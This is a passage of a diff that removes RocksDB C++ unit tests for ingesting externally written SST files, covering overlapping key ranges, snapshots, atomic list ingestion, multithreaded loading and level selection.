-    ASSERT_EQ(file1_info.file_path, file1);
-    ASSERT_EQ(file1_info.num_entries, 100);
-    ASSERT_EQ(file1_info.smallest_key, Key(0));
-    ASSERT_EQ(file1_info.largest_key, Key(99));
-    // sst_file_writer already finished, cannot add this value
-    s = sst_file_writer.Put(Key(100), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // file2.sst (100 => 199)
-    std::string file2 = sst_files_dir_ + "file2.sst";
-    ASSERT_OK(sst_file_writer.Open(file2));
-    for (int k = 100; k < 200; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    // Cannot add this key because it's not after last added key
-    s = sst_file_writer.Put(Key(99), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-    ExternalSstFileInfo file2_info;
-    s = sst_file_writer.Finish(&file2_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file2_info.file_path, file2);
-    ASSERT_EQ(file2_info.num_entries, 100);
-    ASSERT_EQ(file2_info.smallest_key, Key(100));
-    ASSERT_EQ(file2_info.largest_key, Key(199));
-
-    // file3.sst (195 => 299)
-    // This file values overlap with file2 values
-    std::string file3 = sst_files_dir_ + "file3.sst";
-    ASSERT_OK(sst_file_writer.Open(file3));
-    for (int k = 195; k < 300; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file3_info;
-    s = sst_file_writer.Finish(&file3_info);
-
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    // Current file size should be non-zero after success finish.
-    ASSERT_GT(sst_file_writer.FileSize(), 0);
-    ASSERT_EQ(file3_info.file_path, file3);
-    ASSERT_EQ(file3_info.num_entries, 105);
-    ASSERT_EQ(file3_info.smallest_key, Key(195));
-    ASSERT_EQ(file3_info.largest_key, Key(299));
-
-    // file4.sst (30 => 39)
-    // This file values overlap with file1 values
-    std::string file4 = sst_files_dir_ + "file4.sst";
-    ASSERT_OK(sst_file_writer.Open(file4));
-    for (int k = 30; k < 40; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file4_info;
-    s = sst_file_writer.Finish(&file4_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file4_info.file_path, file4);
-    ASSERT_EQ(file4_info.num_entries, 10);
-    ASSERT_EQ(file4_info.smallest_key, Key(30));
-    ASSERT_EQ(file4_info.largest_key, Key(39));
-
-    // file5.sst (400 => 499)
-    std::string file5 = sst_files_dir_ + "file5.sst";
-    ASSERT_OK(sst_file_writer.Open(file5));
-    for (int k = 400; k < 500; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file5_info;
-    s = sst_file_writer.Finish(&file5_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file5_info.file_path, file5);
-    ASSERT_EQ(file5_info.num_entries, 100);
-    ASSERT_EQ(file5_info.smallest_key, Key(400));
-    ASSERT_EQ(file5_info.largest_key, Key(499));
-
-    // Cannot create an empty sst file
-    std::string file_empty = sst_files_dir_ + "file_empty.sst";
-    ExternalSstFileInfo file_empty_info;
-    s = sst_file_writer.Finish(&file_empty_info);
-    ASSERT_NOK(s);
-
-    DestroyAndReopen(options);
-    // Add file using file path
-    s = DeprecatedAddFile({file1});
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 100; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    // Add file while holding a snapshot will fail
-    const Snapshot* s1 = db_->GetSnapshot();
-    if (s1 != nullptr) {
-      ASSERT_NOK(DeprecatedAddFile({file2}));
-      db_->ReleaseSnapshot(s1);
-    }
-    // We can add the file after releaseing the snapshot
-    ASSERT_OK(DeprecatedAddFile({file2}));
-
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 200; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    // This file has overlapping values with the existing data
-    s = DeprecatedAddFile({file3});
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // This file has overlapping values with the existing data
-    s = DeprecatedAddFile({file4});
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // Overwrite values of keys divisible by 5
-    for (int k = 0; k < 200; k += 5) {
-      ASSERT_OK(Put(Key(k), Key(k) + "_val_new"));
-    }
-    ASSERT_NE(db_->GetLatestSequenceNumber(), 0U);
-
-    // Key range of file5 (400 => 499) dont overlap with any keys in DB
-    ASSERT_OK(DeprecatedAddFile({file5}));
-
-    // Make sure values are correct before and after flush/compaction
-    for (int i = 0; i < 2; i++) {
-      for (int k = 0; k < 200; k++) {
-        std::string value = Key(k) + "_val";
-        if (k % 5 == 0) {
-          value += "_new";
-        }
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      for (int k = 400; k < 500; k++) {
-        std::string value = Key(k) + "_val";
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      ASSERT_OK(Flush());
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    }
-
-    Close();
-    options.disable_auto_compactions = true;
-    Reopen(options);
-
-    // Delete keys in range (400 => 499)
-    for (int k = 400; k < 500; k++) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    // We deleted range (400 => 499) but cannot add file5 because
-    // of the range tombstones
-    ASSERT_NOK(DeprecatedAddFile({file5}));
-
-    // Compacting the DB will remove the tombstones
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-    // Now we can add the file
-    ASSERT_OK(DeprecatedAddFile({file5}));
-
-    // Verify values of file5 in DB
-    for (int k = 400; k < 500; k++) {
-      std::string value = Key(k) + "_val";
-      ASSERT_EQ(Get(Key(k)), value);
-    }
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-class SstFileWriterCollector : public TablePropertiesCollector {
- public:
-  explicit SstFileWriterCollector(const std::string prefix) : prefix_(prefix) {
-    name_ = prefix_ + "_SstFileWriterCollector";
-  }
-
-  const char* Name() const override { return name_.c_str(); }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    *properties = UserCollectedProperties{
-        {prefix_ + "_SstFileWriterCollector", "YES"},
-        {prefix_ + "_Count", std::to_string(count_)},
-    };
-    return Status::OK();
-  }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    ++count_;
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  uint32_t count_ = 0;
-  std::string prefix_;
-  std::string name_;
-};
-
-class SstFileWriterCollectorFactory : public TablePropertiesCollectorFactory {
- public:
-  explicit SstFileWriterCollectorFactory(std::string prefix)
-      : prefix_(prefix), num_created_(0) {}
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    num_created_++;
-    return new SstFileWriterCollector(prefix_);
-  }
-  const char* Name() const override { return "SstFileWriterCollectorFactory"; }
-
-  std::string prefix_;
-  uint32_t num_created_;
-};
-
-TEST_F(ExternalSSTFileTest, AddList) {
-  do {
-    Options options = CurrentOptions();
-
-    auto abc_collector = std::make_shared<SstFileWriterCollectorFactory>("abc");
-    auto xyz_collector = std::make_shared<SstFileWriterCollectorFactory>("xyz");
-
-    options.table_properties_collector_factories.emplace_back(abc_collector);
-    options.table_properties_collector_factories.emplace_back(xyz_collector);
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    // file1.sst (0 => 99)
-    std::string file1 = sst_files_dir_ + "file1.sst";
-    ASSERT_OK(sst_file_writer.Open(file1));
-    for (int k = 0; k < 100; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file1_info;
-    Status s = sst_file_writer.Finish(&file1_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file1_info.file_path, file1);
-    ASSERT_EQ(file1_info.num_entries, 100);
-    ASSERT_EQ(file1_info.smallest_key, Key(0));
-    ASSERT_EQ(file1_info.largest_key, Key(99));
-    // sst_file_writer already finished, cannot add this value
-    s = sst_file_writer.Put(Key(100), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // file2.sst (100 => 199)
-    std::string file2 = sst_files_dir_ + "file2.sst";
-    ASSERT_OK(sst_file_writer.Open(file2));
-    for (int k = 100; k < 200; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    // Cannot add this key because it's not after last added key
-    s = sst_file_writer.Put(Key(99), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-    ExternalSstFileInfo file2_info;
-    s = sst_file_writer.Finish(&file2_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file2_info.file_path, file2);
-    ASSERT_EQ(file2_info.num_entries, 100);
-    ASSERT_EQ(file2_info.smallest_key, Key(100));
-    ASSERT_EQ(file2_info.largest_key, Key(199));
-
-    // file3.sst (195 => 199)
-    // This file values overlap with file2 values
-    std::string file3 = sst_files_dir_ + "file3.sst";
-    ASSERT_OK(sst_file_writer.Open(file3));
-    for (int k = 195; k < 200; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file3_info;
-    s = sst_file_writer.Finish(&file3_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file3_info.file_path, file3);
-    ASSERT_EQ(file3_info.num_entries, 5);
-    ASSERT_EQ(file3_info.smallest_key, Key(195));
-    ASSERT_EQ(file3_info.largest_key, Key(199));
-
-    // file4.sst (30 => 39)
-    // This file values overlap with file1 values
-    std::string file4 = sst_files_dir_ + "file4.sst";
-    ASSERT_OK(sst_file_writer.Open(file4));
-    for (int k = 30; k < 40; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file4_info;
-    s = sst_file_writer.Finish(&file4_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file4_info.file_path, file4);
-    ASSERT_EQ(file4_info.num_entries, 10);
-    ASSERT_EQ(file4_info.smallest_key, Key(30));
-    ASSERT_EQ(file4_info.largest_key, Key(39));
-
-    // file5.sst (200 => 299)
-    std::string file5 = sst_files_dir_ + "file5.sst";
-    ASSERT_OK(sst_file_writer.Open(file5));
-    for (int k = 200; k < 300; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file5_info;
-    s = sst_file_writer.Finish(&file5_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file5_info.file_path, file5);
-    ASSERT_EQ(file5_info.num_entries, 100);
-    ASSERT_EQ(file5_info.smallest_key, Key(200));
-    ASSERT_EQ(file5_info.largest_key, Key(299));
-
-    // list 1 has internal key range conflict
-    std::vector<std::string> file_list0({file1, file2});
-    std::vector<std::string> file_list1({file3, file2, file1});
-    std::vector<std::string> file_list2({file5});
-    std::vector<std::string> file_list3({file3, file4});
-
-    DestroyAndReopen(options);
-
-    // This list of files have key ranges are overlapping with each other
-    s = DeprecatedAddFile(file_list1);
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // Add files using file path list
-    s = DeprecatedAddFile(file_list0);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 200; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    TablePropertiesCollection props;
-    ASSERT_OK(db_->GetPropertiesOfAllTables(&props));
-    ASSERT_EQ(props.size(), 2);
-    for (auto file_props : props) {
-      auto user_props = file_props.second->user_collected_properties;
-      ASSERT_EQ(user_props["abc_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["xyz_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["abc_Count"], "100");
-      ASSERT_EQ(user_props["xyz_Count"], "100");
-    }
-
-    // Add file while holding a snapshot will fail
-    const Snapshot* s1 = db_->GetSnapshot();
-    if (s1 != nullptr) {
-      ASSERT_NOK(DeprecatedAddFile(file_list2));
-      db_->ReleaseSnapshot(s1);
-    }
-    // We can add the file after releaseing the snapshot
-    ASSERT_OK(DeprecatedAddFile(file_list2));
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 300; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    ASSERT_OK(db_->GetPropertiesOfAllTables(&props));
-    ASSERT_EQ(props.size(), 3);
-    for (auto file_props : props) {
-      auto user_props = file_props.second->user_collected_properties;
-      ASSERT_EQ(user_props["abc_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["xyz_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["abc_Count"], "100");
-      ASSERT_EQ(user_props["xyz_Count"], "100");
-    }
-
-    // This file list has overlapping values with the existing data
-    s = DeprecatedAddFile(file_list3);
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // Overwrite values of keys divisible by 5
-    for (int k = 0; k < 200; k += 5) {
-      ASSERT_OK(Put(Key(k), Key(k) + "_val_new"));
-    }
-    ASSERT_NE(db_->GetLatestSequenceNumber(), 0U);
-
-    // Make sure values are correct before and after flush/compaction
-    for (int i = 0; i < 2; i++) {
-      for (int k = 0; k < 200; k++) {
-        std::string value = Key(k) + "_val";
-        if (k % 5 == 0) {
-          value += "_new";
-        }
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      for (int k = 200; k < 300; k++) {
-        std::string value = Key(k) + "_val";
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      ASSERT_OK(Flush());
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    }
-
-    // Delete keys in range (200 => 299)
-    for (int k = 200; k < 300; k++) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    // We deleted range (200 => 299) but cannot add file5 because
-    // of the range tombstones
-    ASSERT_NOK(DeprecatedAddFile(file_list2));
-
-    // Compacting the DB will remove the tombstones
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-    // Now we can add the file
-    ASSERT_OK(DeprecatedAddFile(file_list2));
-
-    // Verify values of file5 in DB
-    for (int k = 200; k < 300; k++) {
-      std::string value = Key(k) + "_val";
-      ASSERT_EQ(Get(Key(k)), value);
-    }
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-
-TEST_F(ExternalSSTFileTest, AddListAtomicity) {
-  do {
-    Options options = CurrentOptions();
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    // files[0].sst (0 => 99)
-    // files[1].sst (100 => 199)
-    // ...
-    // file[8].sst (800 => 899)
-    int n = 9;
-    std::vector<std::string> files(n);
-    std::vector<ExternalSstFileInfo> files_info(n);
-    for (int i = 0; i < n; i++) {
-      files[i] = sst_files_dir_ + "file" + std::to_string(i) + ".sst";
-      ASSERT_OK(sst_file_writer.Open(files[i]));
-      for (int k = i * 100; k < (i + 1) * 100; k++) {
-        ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-      }
-      Status s = sst_file_writer.Finish(&files_info[i]);
-      ASSERT_TRUE(s.ok()) << s.ToString();
-      ASSERT_EQ(files_info[i].file_path, files[i]);
-      ASSERT_EQ(files_info[i].num_entries, 100);
-      ASSERT_EQ(files_info[i].smallest_key, Key(i * 100));
-      ASSERT_EQ(files_info[i].largest_key, Key((i + 1) * 100 - 1));
-    }
-    files.push_back(sst_files_dir_ + "file" + std::to_string(n) + ".sst");
-    auto s = DeprecatedAddFile(files);
-    ASSERT_NOK(s) << s.ToString();
-    for (int k = 0; k < n * 100; k++) {
-      ASSERT_EQ("NOT_FOUND", Get(Key(k)));
-    }
-    files.pop_back();
-    ASSERT_OK(DeprecatedAddFile(files));
-    for (int k = 0; k < n * 100; k++) {
-      std::string value = Key(k) + "_val";
-      ASSERT_EQ(Get(Key(k)), value);
-    }
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-// This test reporduce a bug that can happen in some cases if the DB started
-// purging obsolete files when we are adding an external sst file.
-// This situation may result in deleting the file while it's being added.
-TEST_F(ExternalSSTFileTest, PurgeObsoleteFilesBug) {
-  Options options = CurrentOptions();
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // file1.sst (0 => 500)
-  std::string sst_file_path = sst_files_dir_ + "file1.sst";
-  Status s = sst_file_writer.Open(sst_file_path);
-  ASSERT_OK(s);
-  for (int i = 0; i < 500; i++) {
-    std::string k = Key(i);
-    s = sst_file_writer.Put(k, k + "_val");
-    ASSERT_OK(s);
-  }
-
-  ExternalSstFileInfo sst_file_info;
-  s = sst_file_writer.Finish(&sst_file_info);
-  ASSERT_OK(s);
-
-  options.delete_obsolete_files_period_micros = 0;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::AddFile:FileCopied", [&](void* arg) {
-        ASSERT_OK(Put("aaa", "bbb"));
-        ASSERT_OK(Flush());
-        ASSERT_OK(Put("aaa", "xxx"));
-        ASSERT_OK(Flush());
-        db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  s = DeprecatedAddFile({sst_file_path});
-  ASSERT_OK(s);
-
-  for (int i = 0; i < 500; i++) {
-    std::string k = Key(i);
-    std::string v = k + "_val";
-    ASSERT_EQ(Get(k), v);
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, SkipSnapshot) {
-  Options options = CurrentOptions();
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // file1.sst (0 => 99)
-  std::string file1 = sst_files_dir_ + "file1.sst";
-  ASSERT_OK(sst_file_writer.Open(file1));
-  for (int k = 0; k < 100; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file1_info;
-  Status s = sst_file_writer.Finish(&file1_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file1_info.file_path, file1);
-  ASSERT_EQ(file1_info.num_entries, 100);
-  ASSERT_EQ(file1_info.smallest_key, Key(0));
-  ASSERT_EQ(file1_info.largest_key, Key(99));
-
-  // file2.sst (100 => 299)
-  std::string file2 = sst_files_dir_ + "file2.sst";
-  ASSERT_OK(sst_file_writer.Open(file2));
-  for (int k = 100; k < 300; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file2_info;
-  s = sst_file_writer.Finish(&file2_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file2_info.file_path, file2);
-  ASSERT_EQ(file2_info.num_entries, 200);
-  ASSERT_EQ(file2_info.smallest_key, Key(100));
-  ASSERT_EQ(file2_info.largest_key, Key(299));
-
-  ASSERT_OK(DeprecatedAddFile({file1}));
-
-  // Add file will fail when holding snapshot and use the default
-  // skip_snapshot_check to false
-  const Snapshot* s1 = db_->GetSnapshot();
-  if (s1 != nullptr) {
-    ASSERT_NOK(DeprecatedAddFile({file2}));
-  }
-
-  // Add file will success when set skip_snapshot_check to true even db holding
-  // snapshot
-  if (s1 != nullptr) {
-    ASSERT_OK(DeprecatedAddFile({file2}, false, true));
-    db_->ReleaseSnapshot(s1);
-  }
-
-  // file3.sst (300 => 399)
-  std::string file3 = sst_files_dir_ + "file3.sst";
-  ASSERT_OK(sst_file_writer.Open(file3));
-  for (int k = 300; k < 400; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file3_info;
-  s = sst_file_writer.Finish(&file3_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file3_info.file_path, file3);
-  ASSERT_EQ(file3_info.num_entries, 100);
-  ASSERT_EQ(file3_info.smallest_key, Key(300));
-  ASSERT_EQ(file3_info.largest_key, Key(399));
-
-  // check that we have change the old key
-  ASSERT_EQ(Get(Key(300)), "NOT_FOUND");
-  const Snapshot* s2 = db_->GetSnapshot();
-  ASSERT_OK(DeprecatedAddFile({file3}, false, true));
-  ASSERT_EQ(Get(Key(300)), Key(300) + ("_val"));
-  ASSERT_EQ(Get(Key(300), s2), Key(300) + ("_val"));
-
-  db_->ReleaseSnapshot(s2);
-}
-
-TEST_F(ExternalSSTFileTest, MultiThreaded) {
-  // Bulk load 10 files every file contain 1000 keys
-  int num_files = 10;
-  int keys_per_file = 1000;
-
-  // Generate file names
-  std::vector<std::string> file_names;
-  for (int i = 0; i < num_files; i++) {
-    std::string file_name = "file_" + ToString(i) + ".sst";
-    file_names.push_back(sst_files_dir_ + file_name);
-  }
-
-  do {
-    Options options = CurrentOptions();
-
-    std::atomic<int> thread_num(0);
-    std::function<void()> write_file_func = [&]() {
-      int file_idx = thread_num.fetch_add(1);
-      int range_start = file_idx * keys_per_file;
-      int range_end = range_start + keys_per_file;
-
-      SstFileWriter sst_file_writer(EnvOptions(), options);
-
-      ASSERT_OK(sst_file_writer.Open(file_names[file_idx]));
-
-      for (int k = range_start; k < range_end; k++) {
-        ASSERT_OK(sst_file_writer.Put(Key(k), Key(k)));
-      }
-
-      Status s = sst_file_writer.Finish();
-      ASSERT_TRUE(s.ok()) << s.ToString();
-    };
-    // Write num_files files in parallel
-    std::vector<port::Thread> sst_writer_threads;
-    for (int i = 0; i < num_files; ++i) {
-      sst_writer_threads.emplace_back(write_file_func);
-    }
-
-    for (auto& t : sst_writer_threads) {
-      t.join();
-    }
-
-    fprintf(stderr, "Wrote %d files (%d keys)\n", num_files,
-            num_files * keys_per_file);
-
-    thread_num.store(0);
-    std::atomic<int> files_added(0);
-    // Thread 0 -> Load {f0,f1}
-    // Thread 1 -> Load {f0,f1}
-    // Thread 2 -> Load {f2,f3}
-    // Thread 3 -> Load {f2,f3}
-    // Thread 4 -> Load {f4,f5}
-    // Thread 5 -> Load {f4,f5}
-    // ...
-    std::function<void()> load_file_func = [&]() {
-      // We intentionally add every file twice, and assert that it was added
-      // only once and the other add failed
-      int thread_id = thread_num.fetch_add(1);
-      int file_idx = (thread_id / 2) * 2;
-      // sometimes we use copy, sometimes link .. the result should be the same
-      bool move_file = (thread_id % 3 == 0);
-
-      std::vector<std::string> files_to_add;
-
-      files_to_add = {file_names[file_idx]};
-      if (static_cast<size_t>(file_idx + 1) < file_names.size()) {
-        files_to_add.push_back(file_names[file_idx + 1]);
-      }
-
-      Status s = DeprecatedAddFile(files_to_add, move_file);
-      if (s.ok()) {
-        files_added += static_cast<int>(files_to_add.size());
-      }
-    };
-
-    // Bulk load num_files files in parallel
-    std::vector<port::Thread> add_file_threads;
-    DestroyAndReopen(options);
-    for (int i = 0; i < num_files; ++i) {
-      add_file_threads.emplace_back(load_file_func);
-    }
-
-    for (auto& t : add_file_threads) {
-      t.join();
-    }
-    ASSERT_EQ(files_added.load(), num_files);
-    fprintf(stderr, "Loaded %d files (%d keys)\n", num_files,
-            num_files * keys_per_file);
-
-    // Overwrite values of keys divisible by 100
-    for (int k = 0; k < num_files * keys_per_file; k += 100) {
-      std::string key = Key(k);
-      Status s = Put(key, key + "_new");
-      ASSERT_TRUE(s.ok());
-    }
-
-    for (int i = 0; i < 2; i++) {
-      // Make sure the values are correct before and after flush/compaction
-      for (int k = 0; k < num_files * keys_per_file; ++k) {
-        std::string key = Key(k);
-        std::string value = (k % 100 == 0) ? (key + "_new") : key;
-        ASSERT_EQ(Get(key), value);
-      }
-      ASSERT_OK(Flush());
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    }
-
-    fprintf(stderr, "Verified %d values\n", num_files * keys_per_file);
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-
-TEST_F(ExternalSSTFileTest, OverlappingRanges) {
-  Random rnd(301);
-  int picked_level = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "ExternalSstFileIngestionJob::Run", [&picked_level](void* arg) {
-      ASSERT_TRUE(arg != nullptr);
-      picked_level = *(static_cast<int*>(arg));
-    });
-  bool need_flush = false;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "DBImpl::IngestExternalFile:NeedFlush", [&need_flush](void* arg) {
-      ASSERT_TRUE(arg != nullptr);
-      need_flush = *(static_cast<bool*>(arg));
-    });
-  bool overlap_with_db = false;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ExternalSstFileIngestionJob::AssignLevelAndSeqnoForIngestedFile",
-      [&overlap_with_db](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        overlap_with_db = *(static_cast<bool*>(arg));
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  do {
-    Options options = CurrentOptions();
-    DestroyAndReopen(options);
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    printf("Option config = %d\n", option_config_);
-    std::vector<std::pair<int, int>> key_ranges;
-    for (int i = 0; i < 500; i++) {
-      int range_start = rnd.Uniform(20000);
-      int keys_per_range = 10 + rnd.Uniform(41);
-
-      key_ranges.emplace_back(range_start, range_start + keys_per_range);
-    }
-
-    int memtable_add = 0;
-    int success_add_file = 0;
-    int failed_add_file = 0;
-    std::map<std::string, std::string> true_data;
-    for (size_t i = 0; i < key_ranges.size(); i++) {
-      int range_start = key_ranges[i].first;
-      int range_end = key_ranges[i].second;
-
-      Status s;
-      std::string range_val = "range_" + ToString(i);
-
-      // For 20% of ranges we use DB::Put, for 80% we use DB::AddFile
-      if (i && i % 5 == 0) {
-        // Use DB::Put to insert range (insert into memtable)
-        range_val += "_put";
-        for (int k = range_start; k <= range_end; k++) {
-          s = Put(Key(k), range_val);
-          ASSERT_OK(s);
-        }
-        memtable_add++;
-      } else {
-        // Use DB::AddFile to insert range
-        range_val += "_add_file";
-
-        // Generate the file containing the range
-        std::string file_name = sst_files_dir_ + env_->GenerateUniqueId();
-        ASSERT_OK(sst_file_writer.Open(file_name));
-        for (int k = range_start; k <= range_end; k++) {
-          s = sst_file_writer.Put(Key(k), range_val);
-          ASSERT_OK(s);
-        }
-        ExternalSstFileInfo file_info;
-        s = sst_file_writer.Finish(&file_info);
-        ASSERT_OK(s);
-
-        // Insert the generated file
-        s = DeprecatedAddFile({file_name});
-        auto it = true_data.lower_bound(Key(range_start));
-        if (option_config_ != kUniversalCompaction &&
-            option_config_ != kUniversalCompactionMultiLevel) {
-          if (it != true_data.end() && it->first <= Key(range_end)) {
-            // This range overlap with data already exist in DB
-            ASSERT_NOK(s);
-            failed_add_file++;
-          } else {
-            ASSERT_OK(s);
-            success_add_file++;
-          }
-        } else {
-          if ((it != true_data.end() && it->first <= Key(range_end)) ||
-              need_flush || picked_level > 0 || overlap_with_db) {
-            // This range overlap with data already exist in DB
-            ASSERT_NOK(s);
-            failed_add_file++;
-          } else {
-            ASSERT_OK(s);
-            success_add_file++;
-          }
-        }
-      }
-
-      if (s.ok()) {
-        // Update true_data map to include the new inserted data
-        for (int k = range_start; k <= range_end; k++) {
-          true_data[Key(k)] = range_val;
-        }
-      }
-
-      // Flush / Compact the DB
-      if (i && i % 50 == 0) {
-        Flush();
-      }
-      if (i && i % 75 == 0) {
-        db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      }
-    }
-
-    printf("Total: %" ROCKSDB_PRIszt
-           " ranges\n"
-           "AddFile()|Success: %d ranges\n"
-           "AddFile()|RangeConflict: %d ranges\n"
-           "Put(): %d ranges\n",
-           key_ranges.size(), success_add_file, failed_add_file, memtable_add);
-
-    // Verify the correctness of the data
-    for (const auto& kv : true_data) {
-      ASSERT_EQ(Get(kv.first), kv.second);
-    }
-    printf("keys/values verified\n");
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-
-TEST_F(ExternalSSTFileTest, PickedLevel) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  DestroyAndReopen(options);
-
-  std::map<std::string, std::string> true_data;
-
-  // File 0 will go to last level (L3)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 10}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "0,0,0,1");
-
-  // File 1 will go to level L2 (since it overlap with file 0 in L3)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 9}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "0,0,1,1");
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ExternalSSTFileTest::PickedLevel:0", "BackgroundCallCompaction:0"},
-      {"DBImpl::BackgroundCompaction:Start",
-       "ExternalSSTFileTest::PickedLevel:1"},
-      {"ExternalSSTFileTest::PickedLevel:2",
